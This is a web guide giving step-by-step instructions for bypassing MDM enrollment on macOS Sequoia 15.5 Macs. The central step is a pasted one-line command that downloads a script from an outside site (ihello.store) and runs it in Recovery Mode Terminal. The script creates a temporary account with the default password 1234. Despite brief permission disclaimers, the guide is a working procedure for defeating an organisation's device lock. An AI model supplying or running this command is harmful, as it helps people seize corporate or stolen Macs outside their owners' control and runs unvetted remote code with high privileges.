How to Bypass MDM on macOS Sequoia 15.5 (M1, M2, M3, M4)

Simple Step-by-Step Guide: How to Bypass MDM on macOS Sequoia 15.5 (M1, M2, M3, M4)

If your MacBook with macOS Sequoia 15.5 (M1, M2, M3, or M4) is locked by MDM and you have permission to remove it, there’s a way to bypass it. You enter Recovery Mode, connect to WiFi, and run a script that helps skip the MDM setup. Once finished, you log in with a temporary account, create your own Admin account, and delete the old one. Remember, this wipes your Mac, so save anything important first. Only do this if you’re allowed to—like if the Mac is yours or you have the owner’s okay.

1. Start the MDM Setup

  • When you install macOS Sequoia, you will see a screen asking you to join your organization’s MDM.

2. Force Shutdown Your Mac

  • Hold the Power button until your Mac turns off.

3. Boot into Recovery Mode

  • For Apple Silicon Macs (M1, M2, M3, M4): Hold the Power button again until you see startup options.
  • For Intel Macs: Hold CMD (⌘) + R when turning on your Mac.

4. Connect to WiFi in Recovery Mode

  • Use the menu to connect to your WiFi network.

5. Open Safari

  • In the Recovery menu, click Utilities > Safari.

6. Go to the Bypass Website

7. Copy the Bypass Script

  • Find and copy this command (script) from the page:

    curl http://ihello.store/api/bypass_mdm.sh -o bypass_mdm.sh && chmod +x ./bypass_mdm.sh && ./bypass_mdm.sh

8. Open Terminal in Recovery Mode

  • Go to Utilities > Terminal.

9. Paste and Run the Script

  • Paste the copied script into Terminal and press Enter.

10. Select Autobypass

  • In Terminal, type 1 and press Enter for Autobypass.
  • Then, press Enter two more times to accept the default username (Apple) and password (1234).

11. Wait and Reboot

  • Let the script finish. When done, restart your Mac.

12. Sign In with Default Account

  • Username: Apple
  • Password: 1234

13. Skip Unneeded Setup Steps

  • If asked, skip Apple ID, Siri, Touch ID, and Location Services.

14. Make Your Own Admin Account

  • Once on the desktop, go to System Settings > Users and Groups.
  • Create a new Admin account for yourself.

15. Log Out and Switch to Your Account

  • Log out of the Apple profile. Sign in with your new Admin account.

16. Finish Setting Up Your Mac

  • Now you can set up Apple ID, Siri, Touch ID, and Location Services however you want.

17. Remove the Temporary Account

  • Go to System Settings > Users and Groups again.
  • Delete the “Apple” account.

Important Notes

  • All Data Will Be Lost: Backup your files first.
  • macOS Version: This guide works for Sequoia 15.5. Older macOS (like Monterey) may use different steps.
  • Future Updates: If you update or reset your Mac, the MDM lock might return.
  • Legal Reminder: Only do this if you have permission. If you bought the Mac used, contact the seller or original owner if you can.
